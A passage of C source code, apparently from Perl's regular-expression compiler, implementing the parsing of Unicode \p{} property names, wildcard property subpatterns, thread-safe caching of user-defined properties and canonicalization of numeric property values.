_invlist_intersection(running_definition, this_definition,
&running_definition);
break;
case '!':
_invlist_union_complement_2nd(running_definition,
this_definition, &running_definition);
break;
default:
Perl_croak(aTHX_ "panic: %s: %d: Unexpected operation %d",
__FILE__, __LINE__, op);
break;
}
/* Position past the '\n' */
s0 = s + 1;
} /* End of loop through the lines of 'contents' */
/* Here, we processed all the lines in 'contents' without error. If we
* didn't add any warnings, simply return success */
if (msgs_length_on_entry == SvCUR(msg)) {
/* If the expansion was empty, the answer isn't nothing: it's an empty
* inversion list */
if (running_definition == NULL) {
running_definition = _new_invlist(1);
}
return running_definition;
}
/* Otherwise, add some explanatory text, but we will return success */
goto return_msg;
return_failure:
running_definition = NULL;
return_msg:
if (name_len > 0) {
sv_catpvs(msg, " in expansion of ");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8, name_len, name));
}
return running_definition;
}
/* As explained below, certain operations need to take place in the first
* thread created. These macros switch contexts */
#ifdef USE_ITHREADS
# define DECLARATION_FOR_GLOBAL_CONTEXT \
PerlInterpreter * save_aTHX = aTHX;
# define SWITCH_TO_GLOBAL_CONTEXT \
PERL_SET_CONTEXT((aTHX = PL_user_def_props_aTHX))
# define RESTORE_CONTEXT PERL_SET_CONTEXT((aTHX = save_aTHX));
# define CUR_CONTEXT aTHX
# define ORIGINAL_CONTEXT save_aTHX
#else
# define DECLARATION_FOR_GLOBAL_CONTEXT
# define SWITCH_TO_GLOBAL_CONTEXT NOOP
# define RESTORE_CONTEXT NOOP
# define CUR_CONTEXT NULL
# define ORIGINAL_CONTEXT NULL
#endif
STATIC void
S_delete_recursion_entry(pTHX_ void *key)
{
/* Deletes the entry used to detect recursion when expanding user-defined
* properties. This is a function so it can be set up to be called even if
* the program unexpectedly quits */
dVAR;
SV ** current_entry;
const STRLEN key_len = strlen((const char *) key);
DECLARATION_FOR_GLOBAL_CONTEXT;
SWITCH_TO_GLOBAL_CONTEXT;
/* If the entry is one of these types, it is a permanent entry, and not the
* one used to detect recursions. This function should delete only the
* recursion entry */
current_entry = hv_fetch(PL_user_def_props, (const char *) key, key_len, 0);
if ( current_entry
&& ! is_invlist(*current_entry)
&& ! SvPOK(*current_entry))
{
(void) hv_delete(PL_user_def_props, (const char *) key, key_len,
G_DISCARD);
}
RESTORE_CONTEXT;
}
STATIC SV *
S_get_fq_name(pTHX_
const char * const name, /* The first non-blank in the \p{}, \P{} */
const Size_t name_len, /* Its length in bytes, not including any trailing space */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool has_colon_colon
)
{
/* Returns a mortal SV containing the fully qualified version of the input
* name */
SV * fq_name;
fq_name = newSVpvs_flags("", SVs_TEMP);
/* Use the current package if it wasn't included in our input */
if (! has_colon_colon) {
const HV * pkg = (IN_PERL_COMPILETIME)
? PL_curstash
: CopSTASH(PL_curcop);
const char* pkgname = HvNAME(pkg);
Perl_sv_catpvf(aTHX_ fq_name, "%" UTF8f,
UTF8fARG(is_utf8, strlen(pkgname), pkgname));
sv_catpvs(fq_name, "::");
}
Perl_sv_catpvf(aTHX_ fq_name, "%" UTF8f,
UTF8fARG(is_utf8, name_len, name));
return fq_name;
}
SV *
Perl_parse_uniprop_string(pTHX_
/* Parse the interior of a \p{}, \P{}. Returns its definition if knowable
* now. If so, the return is an inversion list.
*
* If the property is user-defined, it is a subroutine, which in turn
* may call other subroutines. This function will call the whole nest of
* them to get the definition they return; if some aren't known at the time
* of the call to this function, the fully qualified name of the highest
* level sub is returned. It is an error to call this function at runtime
* without every sub defined.
*
* If an error was found, NULL is returned, and 'msg' gets a suitable
* message appended to it. (Appending allows the back trace of how we got
* to the faulty definition to be displayed through nested calls of
* user-defined subs.)
*
* The caller should NOT try to free any returned inversion list.
*
* Other parameters will be set on return as described below */
const char * const name, /* The first non-blank in the \p{}, \P{} */
const Size_t name_len, /* Its length in bytes, not including any
trailing space */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool to_fold, /* ? Is this under /i */
const bool runtime, /* TRUE if this is being called at run time */
const bool deferrable, /* TRUE if it's ok for the definition to not be
known at this call */
bool *user_defined_ptr, /* Upon return from this function it will be
set to TRUE if any component is a
user-defined property */
SV * msg, /* Any error or warning msg(s) are appended to
this */
const STRLEN level) /* Recursion level of this call */
{
dVAR;
char* lookup_name; /* normalized name for lookup in our tables */
unsigned lookup_len; /* Its length */
bool stricter = FALSE; /* Some properties have stricter name
normalization rules, which we decide upon
based on parsing */
/* nv= or numeric_value=, or possibly one of the cjk numeric properties
* (though it requires extra effort to download them from Unicode and
* compile perl to know about them) */
bool is_nv_type = FALSE;
unsigned int i, j = 0;
int equals_pos = -1; /* Where the '=' is found, or negative if none */
int slash_pos = -1; /* Where the '/' is found, or negative if none */
int table_index = 0; /* The entry number for this property in the table
of all Unicode property names */
bool starts_with_In_or_Is = FALSE; /* ? Does the name start with 'In' or
'Is' */
Size_t lookup_offset = 0; /* Used to ignore the first few characters of
the normalized name in certain situations */
Size_t non_pkg_begin = 0; /* Offset of first byte in 'name' that isn't
part of a package name */
bool could_be_user_defined = TRUE; /* ? Could this be a user-defined
property rather than a Unicode
one. */
SV * prop_definition = NULL; /* The returned definition of 'name' or NULL
if an error. If it is an inversion list,
it is the definition. Otherwise it is a
string containing the fully qualified sub
name of 'name' */
SV * fq_name = NULL; /* For user-defined properties, the fully
qualified name */
bool invert_return = FALSE; /* ? Do we need to complement the result before
returning it */
PERL_ARGS_ASSERT_PARSE_UNIPROP_STRING;
/* The input will be normalized into 'lookup_name' */
Newx(lookup_name, name_len, char);
SAVEFREEPV(lookup_name);
/* Parse the input. */
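/* As a hypothetical illustration of the normalization done below, an input
 * such as "Line_Break=Close-Punctuation" ends up in 'lookup_name' as
 * "linebreak=closepunctuation": case is folded to lower, and '_', '-' and
 * white space are dropped (subject to the stricter rules decided later) */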
for (i = 0; i < name_len; i++) {
char cur = name[i];
/* Most of the characters in the input will be of this ilk, being parts
* of a name */
if (isIDCONT_A(cur)) {
/* Case differences are ignored. Our lookup routine assumes
* everything is lowercase, so normalize to that */
if (isUPPER_A(cur)) {
lookup_name[j++] = toLOWER_A(cur);
continue;
}
if (cur == '_') { /* Don't include these in the normalized name */
continue;
}
lookup_name[j++] = cur;
/* The first character in a user-defined name must be of this type.
* */
if (i - non_pkg_begin == 0 && ! isIDFIRST_A(cur)) {
could_be_user_defined = FALSE;
}
continue;
}
/* Here, the character is not something typically in a name. But these
* two types of characters (and the '_' above) can be freely ignored in
* most situations. Later it may turn out we shouldn't have ignored
* them, and we have to reparse, but we don't have enough information
* yet to make that decision */
if (cur == '-' || isSPACE_A(cur)) {
could_be_user_defined = FALSE;
continue;
}
/* An equals sign or single colon mark the end of the first part of
* the property name */
if ( cur == '='
|| (cur == ':' && (i >= name_len - 1 || name[i+1] != ':')))
{
lookup_name[j++] = '='; /* Treat the colon as an '=' */
equals_pos = j; /* Note where it occurred in the input */
could_be_user_defined = FALSE;
break;
}
/* Otherwise, this character is part of the name. */
lookup_name[j++] = cur;
/* Here it isn't a single colon, so if it is a colon, it must be a
* double colon */
if (cur == ':') {
/* A double colon should be a package qualifier. We note its
* position and continue. Note that one could have
* pkg1::pkg2::...::foo
* so that the position at the end of the loop will be just after
* the final qualifier */
i++;
non_pkg_begin = i + 1;
lookup_name[j++] = ':';
}
else { /* Only word chars (and '::') can be in a user-defined name */
could_be_user_defined = FALSE;
}
} /* End of parsing through the lhs of the property name (or all of it if
no rhs) */
#define STRLENs(s) (sizeof("" s "") - 1)
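/* sizeof applied to a string literal includes the trailing NUL, so
 * subtracting 1 yields the string's length at compile time; the surrounding
 * "" concatenation ensures the macro argument really is a literal */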
/* If there is a single package name 'utf8::', it is ambiguous. It could
* be for a user-defined property, or it could be a Unicode property, as
* all of them are considered to be for that package. For the purposes of
* parsing the rest of the property, strip it off */
if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
lookup_name += STRLENs("utf8::");
j -= STRLENs("utf8::");
equals_pos -= STRLENs("utf8::");
}
/* Here, we are either done with the whole property name, if it was simple;
* or are positioned just after the '=' if it is compound. */
if (equals_pos >= 0) {
assert(! stricter); /* We shouldn't have set this yet */
/* Space immediately after the '=' is ignored */
i++;
for (; i < name_len; i++) {
if (! isSPACE_A(name[i])) {
break;
}
}
/* Most punctuation after the equals indicates a subpattern, like
* \p{foo=/bar/} */
if ( isPUNCT_A(name[i])
&& name[i] != '-'
&& name[i] != '+'
&& name[i] != '_'
&& name[i] != '{')
{
/* Find the property. The table includes the equals sign, so we
* use 'j' as-is */
table_index = match_uniprop((U8 *) lookup_name, j);
if (table_index) {
const char * const * prop_values
= UNI_prop_value_ptrs[table_index];
SV * subpattern;
Size_t subpattern_len;
REGEXP * subpattern_re;
char open = name[i++];
char close;
const char * pos_in_brackets;
bool escaped = 0;
/* A backslash means the real delimiter is the next character.
* */
if (open == '\\') {
open = name[i++];
escaped = 1;
}
/* This data structure is constructed so that the matching
* closing bracket is 3 past its matching opening. The second
* set of closers is so that if the opening is something like
* ']', the closing will be that same character. Something similar is
* done in toke.c */
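/* For example, an 'open' of '<' is found at offset 2 of the string below,
 * so 'close' becomes the character at offset 5, '>'; an 'open' of ']' is
 * first found at offset 4, giving ']' again as the closer */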
pos_in_brackets = strchr("([<)]>)]>", open);
close = (pos_in_brackets) ? pos_in_brackets[3] : open;
if ( i >= name_len
|| name[name_len-1] != close
|| (escaped && name[name_len-2] != '\\'))
{
sv_catpvs(msg, "Unicode property wildcard not terminated");
goto append_name_to_msg;
}
Perl_ck_warner_d(aTHX_
packWARN(WARN_EXPERIMENTAL__UNIPROP_WILDCARDS),
"The Unicode property wildcards feature is experimental");
/* Now create and compile the wildcard subpattern. Use /iaa
* because nothing outside of ASCII will match, and the
* property values should all match /i. Note that when the
* pattern fails to compile, our added text to the user's
* pattern will be displayed to the user, which is not so
* desirable. */
subpattern_len = name_len - i - 1 - escaped;
subpattern = Perl_newSVpvf(aTHX_ "(?iaa:%.*s)",
(unsigned) subpattern_len,
name + i);
subpattern = sv_2mortal(subpattern);
subpattern_re = re_compile(subpattern, 0);
assert(subpattern_re); /* Should have died if didn't compile
successfully */
/* For each legal property value, see if the supplied pattern
* matches it. */
while (*prop_values) {
const char * const entry = *prop_values;
const Size_t len = strlen(entry);
SV* entry_sv = newSVpvn_flags(entry, len, SVs_TEMP);
if (pregexec(subpattern_re,
(char *) entry,
(char *) entry + len,
(char *) entry, 0,
entry_sv,
0))
{ /* Here, matched. Add to the returned list */
Size_t total_len = j + len;
SV * sub_invlist = NULL;
char * this_string;
/* We know this is a legal \p{property=value}. Call
* the function to return the list of code points that
* match it */
Newxz(this_string, total_len + 1, char);
Copy(lookup_name, this_string, j, char);
my_strlcat(this_string, entry, total_len + 1);
SAVEFREEPV(this_string);
sub_invlist = parse_uniprop_string(this_string,
total_len,
is_utf8,
to_fold,
runtime,
deferrable,
user_defined_ptr,
msg,
level + 1);
_invlist_union(prop_definition, sub_invlist,
&prop_definition);
}
prop_values++; /* Next iteration, look at next propvalue */
} /* End of looking through property values; (the data
structure is terminated by a NULL ptr) */
SvREFCNT_dec_NN(subpattern_re);
if (prop_definition) {
return prop_definition;
}
sv_catpvs(msg, "No Unicode property value wildcard matches:");
goto append_name_to_msg;
}
/* Here's how khw thinks we should proceed to handle the properties
* not yet done: Bidi Mirroring Glyph
Bidi Paired Bracket
Case Folding (both full and simple)
Decomposition Mapping
Equivalent Unified Ideograph
Name
Name Alias
Lowercase Mapping (both full and simple)
NFKC Case Fold
Titlecase Mapping (both full and simple)
Uppercase Mapping (both full and simple)
* Move the part that looks at the property values into a perl
* script, as is done with utf8_heavy.pl. This makes things somewhat
* easier, but most importantly, it avoids always adding all these
* strings to the memory usage when the feature is little-used.
*
* The property values would all be concatenated into a single
* string per property with each value on a separate line, and the
* code point it's for on alternating lines. Then we match the
* user's input pattern m//mg, without having to worry about their
* uses of '^' and '$'. Only the values that aren't the default
* would be in the strings. Code points would be in UTF-8. The
* search pattern that we would construct would look like
* (?: \n (code-point_re) \n (?aam: user-re ) \n )
* And so $1 would contain the code point that matched the user-re.
* For properties where the default is the code point itself, such
* as any of the case changing mappings, the string would otherwise
* consist of all Unicode code points in UTF-8 strung together.
* This would be impractical. So instead, examine their compiled
* pattern, looking at the ssc. If none, reject the pattern as an
* error. Otherwise run the pattern against every code point in
* the ssc. The ssc is kind of like tr18's 3.9 Possible Match Sets.
* And it might be good to create an API to return the ssc.
*
* For the name properties, a new function could be created in
* charnames which essentially does the same thing as above,
* sharing Name.pl with the other charname functions. Don't know
* about loose name matching, or algorithmically determined names.
* Decomposition.pl similarly.
*
* It might be that a new pattern modifier would have to be
* created, like /t for resTricTed, which changed the behavior of
* some constructs in their subpattern, like \A. */
} /* End of is a wildcard subpattern */
/* Certain properties whose values are numeric need special handling.
* They may optionally be prefixed by 'is'. Ignore that prefix for the
* purposes of checking if this is one of those properties */
if (memBEGINPs(lookup_name, j, "is")) {
lookup_offset = 2;
}
/* Then check if it is one of these specially-handled properties. The
* possibilities are hard-coded because easier this way, and the list
* is unlikely to change.
*
* All numeric value type properties are of this ilk, and are also
* special in a different way later on. So find those first. There
* are several numeric value type properties in the Unihan DB (which is
* unlikely to be compiled with perl, but we handle it here in case it
* does get compiled). They all end with 'numeric'. The interiors
* aren't checked for the precise property. This would stop working if
* a cjk property were to be created that ended with 'numeric' and
* wasn't a numeric type */
is_nv_type = memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "numericvalue")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "nv")
|| ( memENDPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "numeric")
&& ( memBEGINPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "cjk")
|| memBEGINPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "k")));
if ( is_nv_type
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "canonicalcombiningclass")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "ccc")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "age")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "in")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "presentin"))
{
unsigned int k;
/* Since the stuff after the '=' is a number, we can't throw away
* '-' willy-nilly, as those could be a minus sign. Other stricter
* rules also apply. However, these properties all can have the
* rhs not be a number, in which case they contain at least one
* alphabetic. In those cases, the stricter rules don't apply.
* But the numeric type properties can have the alphas [Ee] to
* signify an exponent, and it is still a number with stricter
* rules. So look for an alpha that signifies not-strict */
stricter = TRUE;
for (k = i; k < name_len; k++) {
if ( isALPHA_A(name[k])
&& (! is_nv_type || ! isALPHA_FOLD_EQ(name[k], 'E')))
{
stricter = FALSE;
break;
}
}
}
if (stricter) {
/* A number may have a leading '+' or '-'. The latter is retained
* */
if (name[i] == '+') {
i++;
}
else if (name[i] == '-') {
lookup_name[j++] = '-';
i++;
}
/* Skip leading zeros including single underscores separating the
* zeros, or between the final leading zero and the first other
* digit */
for (; i < name_len - 1; i++) {
if ( name[i] != '0'
&& (name[i] != '_' || ! isDIGIT_A(name[i+1])))
{
break;
}
}
}
}
else { /* No '=' */
/* Only a few properties without an '=' should be parsed with stricter
* rules. The list is unlikely to change. */
if ( memBEGINPs(lookup_name, j, "perl")
&& memNEs(lookup_name + 4, j - 4, "space")
&& memNEs(lookup_name + 4, j - 4, "word"))
{
stricter = TRUE;
/* We set the inputs back to 0 and the code below will reparse,
* using strict */
i = j = 0;
}
}
/* Here, we have either finished the property, or are positioned to parse
* the remainder, and we know if stricter rules apply. Finish out, if not
* already done */
for (; i < name_len; i++) {
char cur = name[i];
/* In all instances, case differences are ignored, and we normalize to
* lowercase */
if (isUPPER_A(cur)) {
lookup_name[j++] = toLOWER(cur);
continue;
}
/* An underscore is skipped, but not under strict rules unless it
* separates two digits */
if (cur == '_') {
if ( stricter
&& ( i == 0 || (int) i == equals_pos || i == name_len- 1
|| ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
{
lookup_name[j++] = '_';
}
continue;
}
/* Hyphens are skipped except under strict */
if (cur == '-' && ! stricter) {
continue;
}
/* XXX Bug in documentation. It says white space skipped adjacent to
* non-word char. Maybe we should, but shouldn't skip it next to a dot
* in a number */
if (isSPACE_A(cur) && ! stricter) {
continue;
}
lookup_name[j++] = cur;
/* Unless this is a non-trailing slash, we are done with it */
if (i >= name_len - 1 || cur != '/') {
continue;
}
slash_pos = j;
/* A slash in the 'numeric value' property indicates that what follows
* is a denominator. It can have a leading '+' and '0's that should be
* skipped. But we have never allowed a negative denominator, so treat
* a minus like every other character. (No need to rule out a second
* '/', as that won't match anything anyway) */
if (is_nv_type) {
i++;
if (i < name_len && name[i] == '+') {
i++;
}
/* Skip leading zeros including underscores separating digits */
for (; i < name_len - 1; i++) {
if ( name[i] != '0'
&& (name[i] != '_' || ! isDIGIT_A(name[i+1])))
{
break;
}
}
/* Store the first real character in the denominator */
lookup_name[j++] = name[i];
}
}
/* Here we are completely done parsing the input 'name', and 'lookup_name'
* contains a copy, normalized.
*
* This special case is grandfathered in: 'L_' and 'GC=L_' are accepted, and
* differ from the same names without the underscores. */
if ( ( UNLIKELY(memEQs(lookup_name, j, "l"))
|| UNLIKELY(memEQs(lookup_name, j, "gc=l")))
&& UNLIKELY(name[name_len-1] == '_'))
{
lookup_name[j++] = '&';
}
/* If the original input began with 'In' or 'Is', it could be a subroutine
* call to a user-defined property instead of a Unicode property name. */
if ( non_pkg_begin + name_len > 2
&& name[non_pkg_begin+0] == 'I'
&& (name[non_pkg_begin+1] == 'n' || name[non_pkg_begin+1] == 's'))
{
starts_with_In_or_Is = TRUE;
}
else {
could_be_user_defined = FALSE;
}
if (could_be_user_defined) {
CV* user_sub;
/* If the user defined property returns the empty string, it could
* easily be because the pattern is being compiled before the data it
* actually needs to compile is available. This could be argued to be
* a bug in the perl code, but this is a change of behavior for Perl,
* so we handle it. This means that intentionally returning nothing
* will not be resolved until runtime */
bool empty_return = FALSE;
/* Here, the name could be for a user defined property, which are
* implemented as subs. */
user_sub = get_cvn_flags(name, name_len, 0);
if (user_sub) {
const char insecure[] = "Insecure user-defined property";
/* Here, there is a sub by the correct name. Normally we call it
* to get the property definition */
dSP;
SV * user_sub_sv = MUTABLE_SV(user_sub);
SV * error; /* Any error returned by calling 'user_sub' */
SV * key; /* The key into the hash of user defined sub names
*/
SV * placeholder;
SV ** saved_user_prop_ptr; /* Hash entry for this property */
/* How many times to retry when another thread is in the middle of
* expanding the same definition we want */
PERL_INT_FAST8_T retry_countdown = 10;
DECLARATION_FOR_GLOBAL_CONTEXT;
/* If we get here, we know this property is user-defined */
*user_defined_ptr = TRUE;
/* We refuse to call a potentially tainted subroutine; returning an
* error instead */
if (TAINT_get) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvn(msg, insecure, sizeof(insecure) - 1);
goto append_name_to_msg;
}
/* In principle, we only call each subroutine property definition
* once during the life of the program. This guarantees that the
* property definition never changes. The results of the single
* sub call are stored in a hash, which is used instead for future
* references to this property. The property definition is thus
* immutable. But, to allow the user to have a /i-dependent
* definition, we call the sub once for non-/i, and once for /i,
* should the need arise, passing the /i status as a parameter.
*
* We start by constructing the hash key name, consisting of the
* fully qualified subroutine name, preceded by the /i status, so
* that there is a key for /i and a different key for non-/i */
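/* So, purely as an illustration, a user-defined sub main::IsMyProp looked up
 * under /i would be stored under the key "1main::IsMyProp", and under
 * "0main::IsMyProp" when not under /i */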
key = newSVpvn(((to_fold) ? "1" : "0"), 1);
fq_name = S_get_fq_name(aTHX_ name, name_len, is_utf8,
non_pkg_begin != 0);
sv_catsv(key, fq_name);
sv_2mortal(key);
/* We only call the sub once throughout the life of the program
* (with the /i, non-/i exception noted above). That means the
* hash must be global and accessible to all threads. It is
* created at program start-up, before any threads are created, so
* is accessible to all children. But this creates some
* complications.
*
* 1) The keys can't be shared, or else problems arise; sharing is
* turned off at hash creation time
* 2) All SVs in it are there for the remainder of the life of the
* program, and must be created in the same interpreter context
* as the hash, or else they will be freed from the wrong pool
* at global destruction time. This is handled by switching to
* the hash's context to create each SV going into it, and then
* immediately switching back
* 3) All accesses to the hash must be controlled by a mutex, to
* prevent two threads from getting an unstable state should
* they simultaneously be accessing it. The code below is
* crafted so that the mutex is locked whenever there is an
* access and unlocked only when the next stable state is
* achieved.
*
* The hash stores either the definition of the property if it was
* valid, or, if invalid, the error message that was raised. We
* use the type of SV to distinguish.
*
* There's also the need to guard against the definition expansion
* from infinitely recursing. This is handled by storing the aTHX
* of the expanding thread during the expansion. Again the SV type
* is used to distinguish this from the other two cases. If we
* come to here and the hash entry for this property is our aTHX,
* it means we have recursed, and the code assumes that we would
* infinitely recurse, so instead stops and raises an error.
* (Any recursion has always been treated as infinite recursion in
* this feature.)
*
* If instead, the entry is for a different aTHX, it means that
* that thread has gotten here first, and hasn't finished expanding
* the definition yet. We just have to wait until it is done. We
* sleep and retry a few times, returning an error if the other
* thread doesn't complete. */
re_fetch:
USER_PROP_MUTEX_LOCK;
/* If we have an entry for this key, the subroutine has already
* been called once with this /i status. */
saved_user_prop_ptr = hv_fetch(PL_user_def_props,
SvPVX(key), SvCUR(key), 0);
if (saved_user_prop_ptr) {
/* If the saved result is an inversion list, it is the valid
* definition of this property */
if (is_invlist(*saved_user_prop_ptr)) {
prop_definition = *saved_user_prop_ptr;
/* The SV in the hash won't be removed until global
* destruction, so it is stable and we can unlock */
USER_PROP_MUTEX_UNLOCK;
/* The caller shouldn't try to free this SV */
return prop_definition;
}
/* Otherwise, if it is a string, it is the error message
* that was returned when we first tried to evaluate this
* property. Fail, and append the message */
if (SvPOK(*saved_user_prop_ptr)) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catsv(msg, *saved_user_prop_ptr);
/* The SV in the hash won't be removed until global
* destruction, so it is stable and we can unlock */
USER_PROP_MUTEX_UNLOCK;
return NULL;
}
assert(SvIOK(*saved_user_prop_ptr));
/* Here, we have an unstable entry in the hash. Either another
* thread is in the middle of expanding the property's
* definition, or we are ourselves recursing. We use the aTHX
* in it to distinguish */
if (SvIV(*saved_user_prop_ptr) != PTR2IV(CUR_CONTEXT)) {
/* Here, it's another thread doing the expanding. We've
* looked as much as we are going to at the contents of the
* hash entry. It's safe to unlock. */
USER_PROP_MUTEX_UNLOCK;
/* Retry a few times */
if (retry_countdown-- > 0) {
PerlProc_sleep(1);
goto re_fetch;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Timeout waiting for another thread to "
"define");
goto append_name_to_msg;
}
/* Here, we are recursing; don't dig any deeper */
USER_PROP_MUTEX_UNLOCK;
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg,
"Infinite recursion in user-defined property");
goto append_name_to_msg;
}
/* Here, this thread has exclusive control, and there is no entry
* for this property in the hash. So we have the go ahead to
* expand the definition ourselves. */
PUSHSTACKi(PERLSI_MAGIC);
ENTER;
/* Create a temporary placeholder in the hash to detect recursion
* */
SWITCH_TO_GLOBAL_CONTEXT;
placeholder= newSVuv(PTR2IV(ORIGINAL_CONTEXT));
(void) hv_store_ent(PL_user_def_props, key, placeholder, 0);
RESTORE_CONTEXT;
/* Now that we have a placeholder, we can let other threads
* continue */
USER_PROP_MUTEX_UNLOCK;
/* Make sure the placeholder always gets destroyed */
SAVEDESTRUCTOR_X(S_delete_recursion_entry, SvPVX(key));
PUSHMARK(SP);
SAVETMPS;
/* Call the user's function, with the /i status as a parameter.
* Note that we have gone to a lot of trouble to keep this call
* from being within the locked mutex region. */
XPUSHs(boolSV(to_fold));
PUTBACK;
/* The following block was taken from swash_init(). Presumably
* they apply to here as well, though we no longer use a swash --
* khw */
SAVEHINTS();
save_re_context();
/* We might get here via a subroutine signature which uses a utf8
* parameter name, at which point PL_subname will have been set
* but not yet used. */
save_item(PL_subname);
(void) call_sv(user_sub_sv, G_EVAL|G_SCALAR);
SPAGAIN;
error = ERRSV;
if (TAINT_get || SvTRUE(error)) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
if (SvTRUE(error)) {
sv_catpvs(msg, "Error \"");
sv_catsv(msg, error);
sv_catpvs(msg, "\"");
}
if (TAINT_get) {
if (SvTRUE(error)) sv_catpvs(msg, "; ");
sv_catpvn(msg, insecure, sizeof(insecure) - 1);
}
if (name_len > 0) {
sv_catpvs(msg, " in expansion of ");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8,
name_len,
name));
}
(void) POPs;
prop_definition = NULL;
}
else { /* G_SCALAR guarantees a single return value */
SV * contents = POPs;
/* The contents is supposed to be the expansion of the property
* definition. If the definition is deferrable, and we got an
* empty string back, set a flag to later defer it (after clean
* up below). */
if ( deferrable
&& (! SvPOK(contents) || SvCUR(contents) == 0))
{
empty_return = TRUE;
}
else { /* Otherwise, call a function to check for valid syntax,
and handle it */
prop_definition = handle_user_defined_property(
name, name_len,
is_utf8, to_fold, runtime,
deferrable,
contents, user_defined_ptr,
msg,
level);
}
}
/* Here, we have the results of the expansion. Delete the
* placeholder, and if the definition is now known, replace it with
* that definition. We need exclusive access to the hash, and we
* can't let anyone else in, between when we delete the placeholder
* and add the permanent entry */
USER_PROP_MUTEX_LOCK;
S_delete_recursion_entry(aTHX_ SvPVX(key));
if ( ! empty_return
&& (! prop_definition || is_invlist(prop_definition)))
{
/* If we got success we use the inversion list defining the
* property; otherwise use the error message */
SWITCH_TO_GLOBAL_CONTEXT;
(void) hv_store_ent(PL_user_def_props,
key,
((prop_definition)
? newSVsv(prop_definition)
: newSVsv(msg)),
0);
RESTORE_CONTEXT;
}
/* All done, and the hash now has a permanent entry for this
* property. Give up exclusive control */
USER_PROP_MUTEX_UNLOCK;
FREETMPS;
LEAVE;
POPSTACK;
if (empty_return) {
goto definition_deferred;
}
if (prop_definition) {
/* If the definition is for something not known at this time,
* we toss it, and go return the main property name, as that's
* the one the user will be aware of */
if (! is_invlist(prop_definition)) {
SvREFCNT_dec_NN(prop_definition);
goto definition_deferred;
}
sv_2mortal(prop_definition);
}
/* And return */
return prop_definition;
} /* End of calling the subroutine for the user-defined property */
} /* End of it could be a user-defined property */
/* Here it wasn't a user-defined property that is known at this time. See
* if it is a Unicode property */
lookup_len = j; /* This is a more mnemonic name than 'j' */
/* Get the index into our pointer table of the inversion list corresponding
* to the property */
table_index = match_uniprop((U8 *) lookup_name, lookup_len);
/* If it didn't find the property ... */
if (table_index == 0) {
/* Try again stripping off any initial 'In' or 'Is' */
if (starts_with_In_or_Is) {
lookup_name += 2;
lookup_len -= 2;
equals_pos -= 2;
slash_pos -= 2;
table_index = match_uniprop((U8 *) lookup_name, lookup_len);
}
if (table_index == 0) {
char * canonical;
/* Here, we didn't find it. If not a numeric type property, and
* can't be a user-defined one, it isn't a legal property */
if (! is_nv_type) {
if (! could_be_user_defined) {
goto failed;
}
/* Here, the property name is legal as a user-defined one. At
* compile time, it might just be that the subroutine for that
* property hasn't been encountered yet, but at runtime, it's
* an error to try to use an undefined one */
if (! deferrable) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Unknown user-defined property name");
goto append_name_to_msg;
}
goto definition_deferred;
} /* End of isn't a numeric type property */
/* The numeric type properties need more work to decide. What we
* do is make sure we have the number in canonical form and look
* that up. */
if (slash_pos < 0) { /* No slash */
/* When it isn't a rational, take the input, convert it to a
* NV, then create a canonical string representation of that
* NV. */
NV value;
SSize_t value_len = lookup_len - equals_pos;
/* Get the value */
if ( value_len <= 0
|| my_atof3(lookup_name + equals_pos, &value,
value_len)
!= lookup_name + lookup_len)
{
goto failed;
}
/* If the value is an integer, the canonical value is integral
* */
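/* (For instance, a value of 3 for an "nv=" lookup would canonicalize to
 * "nv=3" here) */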
if (Perl_ceil(value) == value) {
canonical = Perl_form(aTHX_ "%.*s%.0" NVff,
equals_pos, lookup_name, value);
}
else { /* Otherwise, it is %e with a known precision */
char * exp_ptr;
canonical = Perl_form(aTHX_ "%.*s%.*" NVef,
equals_pos, lookup_name,
PL_E_FORMAT_PRECISION, value);
/* The exponent generated is expecting two digits, whereas
* %e on some systems will generate three. Remove leading
* zeros in excess of 2 from the exponent. We start
* looking for them after the '=' */
exp_ptr = strchr(canonical + equals_pos, 'e');
if (exp_ptr) {
char * cur_ptr = exp_ptr + 2; /* past the 'e[+-]' */
SSize_t excess_exponent_len = strlen(cur_ptr) - 2;
assert(*(cur_ptr - 1) == '-' || *(cur_ptr - 1) == '+');
if (excess_exponent_len > 0) {
SSize_t leading_zeros = strspn(cur_ptr, "0");
SSize_t excess_leading_zeros
= MIN(leading_zeros, excess_exponent_len);
if (excess_leading_zeros > 0) {
Move(cur_ptr + excess_leading_zeros,
cur_ptr,
strlen(cur_ptr) - excess_leading_zeros
+ 1, /* Copy the NUL as well */
char);
}
}
}
}
}
else { /* Has a slash. Create a rational in canonical form */
UV numerator, denominator, gcd, trial;
const char * end_ptr;
const char * sign = "";
/* We can't just find the numerator, denominator, and do the
* division, then use the method above, because that is
* inexact. And the input could be a rational that is within
* epsilon (given our precision) of a valid rational, and would
* then incorrectly compare valid.
*
* We're only interested in the part after the '=' */
const char * this_lookup_name = lookup_name + equals_pos;
lookup_len -= equals_pos;
slash_pos -= equals_pos;
/* Handle any leading minus */
if (this_lookup_name[0] == '-') {
sign = "-";
this_lookup_name++;
lookup_len--;
slash_pos--;
}
/* Convert the numerator to numeric */
end_ptr = this_lookup_name + slash_pos;
if (! grok_atoUV(this_lookup_name, &numerator, &end_ptr)) {
goto failed;
}
